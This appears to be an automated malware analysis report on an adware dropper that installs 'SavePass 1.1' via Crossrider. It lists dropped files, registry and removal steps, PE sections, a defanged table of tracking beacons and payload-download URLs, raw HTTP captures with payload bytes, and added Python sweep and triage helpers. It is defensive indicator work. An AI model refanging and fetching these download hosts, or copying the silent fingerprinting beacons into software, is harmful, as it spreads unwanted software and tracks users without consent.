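def sweep(root: str, md5s: Optional[Set[str]] = None) -> List[Tuple[str, str]]:
    """Return (path, reason) for every file matching a known hash, name or directory."""
    known = set(DROPPED_MD5) if md5s is None else md5s
    hits = []
    for p in Path(root).rglob("*"):
        if not p.is_file():
            continue
        if p.parent.name.lower() == SAVEPASS_DIR:
            hits.append((str(p), "inside SavePass 1.1 directory"))
        if any(rx.match(p.name) for rx in NAME_PATTERNS):
            hits.append((str(p), "known dropped file name"))
        if file_digests(p)["md5"] in known:
            hits.append((str(p), "known MD5"))
    return hits


def demo() -> List[Tuple[str, str]]:
    """Constructed tree (no real malware): marker files plus one whose content
    b"abc" has the well-known MD5 900150983cd24fb0d6963f7d28e17f72."""
    root = Path(tempfile.mkdtemp())
    (root / "Program Files" / "SavePass 1.1").mkdir(parents=True)
    (root / "Program Files" / "SavePass 1.1" / "utils.exe").write_bytes(b"MZ" + b"\0" * 64)
    (root / "Tasks").mkdir()
    (root / "Tasks" / "46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job").write_bytes(b"\0" * 72)
    (root / "Temp").mkdir()
    (root / "Temp" / "setup[1].exe_c").write_bytes(b"MZ")
    (root / "Temp" / "known.bin").write_bytes(b"abc")
    (root / "Temp" / "benign.txt").write_bytes(b"hello")
    return sweep(str(root), set(DROPPED_MD5) | {"900150983cd24fb0d6963f7d28e17f72"})


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{reason:32} {path}")
```

Hash matches are exact but brittle (the report lists an MD5 only for chunk _a, and a rebuilt installer changes every digest), which is why the name and directory rules are kept alongside them; on a real host, point sweep() at %Program Files%, %WinDir%\Tasks and the user's Local Settings\Temp and Temporary Internet Files trees.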
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)
- Delete the registry keys and values listed under Registry activity, in particular [HKLM\SOFTWARE\Crossrider], [HKCU\Software\Crossrider], the InstalledBrowserExtensions keys under HKLM\SOFTWARE and HKCU\Software, and [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]; restore any proxy settings the installer removed.
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 347 | 512 | 2.72762 | bd24fddc16367e94a0e4291cdc13185a |
.rdata | 8192 | 366 | 512 | 2.4907 | ae9775f4ec0f9ea8215ac0d0005da1bf |
The two listed sections hold under 1 KB of raw data between them in a 212,384-byte file, so the bulk of the file lies outside the section table (overlay or unlisted sections); the PEiD match should be treated as a heuristic. The NSIS plug-in DLLs (System.dll, StdUtils.dll, nsisos.dll, UserInfo.dll, md5dll.dll) extracted into the ns*.tmp directories show that the second and third stages (e33a47b.exe and Ywuovtbypk.exe) are NSIS installers.
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 | 208.85.150.249 |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_b | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_e | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_c | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_a | |
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_d | |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 | 208.85.150.249 |
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1504&action=na&ms_vr=3&clock=7422&rnd=3827 | 208.85.150.249 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 | |
hxxp://ipgeoapi.com/ | 107.20.198.133 |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847 | |
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 | |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 | |
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 | |
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 | |
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=1504&action=na&ms_vr=3&clock=20031&rnd=32150 | 208.85.150.249 |
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_b | 69.16.175.10 |
hxxp://stats.ourinputdatastorage.com/installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 | 54.231.64.164 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 | 54.231.12.124 |
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_a | 69.16.175.10 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 | 54.231.12.124 |
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_d | 69.16.175.10 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 | 54.231.12.124 |
hxxp://stats.ourinputdatastorage.com/installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 | 54.231.64.164 |
hxxp://stats.ourinputdatastorage.com/apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 | 54.231.64.164 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 | 54.231.12.124 |
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_e | 69.16.175.10 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 | 54.231.12.124 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 | 54.231.12.124 |
hxxp://logs.ourinputdatastorage.com/monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 | 69.16.175.42 |
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_c | 69.16.175.10 |
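Added triage example (not part of the Lavasoft-generated report and not code from the sample): the rows above are a defanged "URL | IP |" table in which the installer fires 1x1 GIF beacons to `errors.`/`stats.`/`logs.ourinputdatastorage.com` (and the same paths on `s3-website-us-east-1.amazonaws.com`) at each funnel step, carries the same per-install identifiers (`bic`, `verifier`, `upi`, `procid`, `crtnm=BlondieProject`) plus OS/browser fingerprint, `admin=1` and `silent=1` on every hit, and fetches five `setup.exe_a`..`_e` bodies from `dl.ourgenstatsstorage.com`. The `setup.exe_a` response in the traffic dump declares `Content-Type: text/plain` but starts with an `MZ` header and a PE whose section list includes `.ndata`, the section name NSIS installers use; the `_b`, `_d` and `_e` bodies shown do not start with `MZ`, so the mismatch check below flags only what the capture supports. The helper parses rows of that shape, orders the funnel beacons by their `i` index, collects the pivotable identifiers, lists non-pixel download hosts, and tests a declared type against the leading bytes. `SAMPLE_ROWS` is constructed from rows in the table with some query strings shortened; the function names are this example's own.

```python
"""Triage helper for the network-activity table above.

Added example; it is not part of the Lavasoft report or of the sample.
It parses defanged 'hxxp://... | IP |' rows, orders the funnel beacons,
pulls the per-install identifiers out of the tracking pixels, and flags
downloads whose declared Content-Type disagrees with the bytes returned.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed sample rows: copied from the table above, with some query
# strings shortened. The IP column is empty for the s3-website rows in
# the report, as it is here.
SAMPLE_ROWS = """\
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 | 54.231.12.124 |
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_a | 69.16.175.10 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 | 54.231.12.124 |
hxxp://stats.ourinputdatastorage.com/installer.gif?action=started&app=69829&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&crtnm=BlondieProject&rnd=1425597847 | 54.231.64.164 |
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 | 54.231.12.124 |
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 | |
"""

# Identifiers the installer sends on every beacon; they are stable across
# the run, so they are what you would pivot on in other captures.
TRACKED_KEYS = ("bic", "verifier", "upi", "procid", "crtnm", "app", "srcid")


def refang(url):
    """Turn the report's 'hxxp' defanging back into a parseable scheme."""
    return "http" + url[4:] if url.startswith("hxxp") else url


def parse_rows(text):
    """Return [(url, ip)] from 'url | ip |' rows; ip is None when the column is empty."""
    rows = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        url, ip = [part.strip() for part in line.split("|")[:2]]
        rows.append((refang(url), ip or None))
    return rows


def funnel_steps(rows):
    """Order the utility.gif funnel beacons by their step index 'i'."""
    steps = []
    for url, _ip in rows:
        parts = urlsplit(url)
        query = parse_qs(parts.query)
        if parts.path.endswith("/utility.gif") and "i" in query and "n" in query:
            steps.append((int(query["i"][0]), query["n"][0]))
    return sorted(steps)


def tracked_identifiers(rows):
    """Collect the per-install identifiers seen across all beacons."""
    seen = {}
    for url, _ip in rows:
        query = parse_qs(urlsplit(url).query)
        for key in TRACKED_KEYS:
            if key in query:
                seen.setdefault(key, set()).add(query[key][0])
    return {key: sorted(values) for key, values in seen.items()}


def download_hosts(rows):
    """(host, ip) pairs that served something other than a tracking pixel."""
    return sorted({(urlsplit(url).hostname, ip) for url, ip in rows
                   if not urlsplit(url).path.endswith(".gif")})


def content_type_mismatch(declared_type, body_prefix):
    """True when a response declared as text/plain actually starts with a PE (MZ) header."""
    media_type = declared_type.split(";")[0].strip().lower()
    return media_type == "text/plain" and body_prefix.startswith(b"MZ")
```

Feed the full table to `parse_rows` to get the complete step sequence (100 through 10000) and the same `bic`/`verifier`/`upi`/`procid` on every beacon; those values, together with `crtnm=BlondieProject` and the two download hosts, are the identifiers worth searching for in other captures. The mismatch check is deliberately narrow: it only reports the combination the dump actually shows, a `text/plain` body that begins with `MZ`.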
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 HTTP/1.1
Host: logs.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:24:07 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1425597847.dop003.fr7.t,1425597847.cds021.fr7.c
GIF89a.............,...........D..;
GET /outil/fuully/styi2/setup.exe_e HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425462000"
Last-Modified: Wed, 04 Mar 2015 09:40:00 GMT
Cache-Control: max-age=2511
Content-Length: 2530648
Content-Type: text/plain
X-HW: 1425597835.dop001.fr7.t,1425597835.cds033.fr7.sr,1425597834.dop005.dc1.r,1425597835.cds023.dc1.c,1425597835.cds033.fr7.pr
..m.8_...u.>6.....n8..H...v......r....'.....x.8..F.LJ~&Q...z..>U.......[V@....D....$^..1.'...g9....:<.k>...(..fB...`7...r.......Q.:7Qiq.<..f\........WH.....m.F...Nu......O..\.m.UA$.T})_.fV}...M..J...7....F...o...l.<...a.d..D..3...(E.T\6.>.45..'.~.4...g..F....&.3y1b..}....O~.P@..........8......<=.@...c.K.........J..l....Y..}Z...........wu.c...W..Y(6Fd....ye..........j8.j.e...v.M...:;..Q. I..E.....o...].|.[.8%L...$.]>...5.....F.J.......3-\.;.C.<..v..)....?.{.(c._.7t..Y...b..O.....-0...8... |..h..WU'h..1.w..h.....s.H.\8..........~......j.sd...$._...G...9.c>.b.vh..*.r...%,..7W(.m. h...i....7..I.U...7.c.T..&Z(.vO.r9u....4.V...-.,|C...~....N..z....V.OB$[....E.<{......^...h..)..{A2ZE.\..Y.aq.'.. ...]..x.n.....Z...:.S.....v......l...C...:..oa.@.. .....'..Z.<f.....^.r;.;..'..'...G...hR.Uh.Y.........^.g...Kx..|z....{-.k/`.....qjds.....^Xc ....#z..7_.<~,o.. ..x..t<.. .5$@.F./..|.r.e.g&r.5....~?.0"2[S#......[..9...*8d.$2Xr.....G \..y....P.e.. C6p.b..'h.`....@c.:.[...[......92.=>?.hA.d..Ho*..r.-..:....!s.L'8..... .W...1.I......>O.4....D...!...7$..e..)..s....a.V.=.....[#oyV.......&.b..N.I....}..aS...l.Nhji........6.........9,..|..d.....|{....H..........A].q..>..f1c..jv3.....'.*..'Q....;lr..T"......'.X.>3.^.7.I..6Y...8..-.w.9.4h..$2.yK............S~.a>.z....5...$... .=..,.~.....y/iMs.W....h.b..........D......B.....$.3....E~h.h....g....o.0#.....M..cNUiC6}..{........WlC./...<R.Q.IAH._..*...q<.D...e.A.....L.R@9PueM....jX6-...&m..q-....z.......@z..a........L..(.X..
<<< skipped >>>
GET /utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:54 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..
GET /utility.gif?error=done_mem_0&report=mini_s&ver=1504&action=na&ms_vr=3&clock=20031&rnd=32150 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.6.0
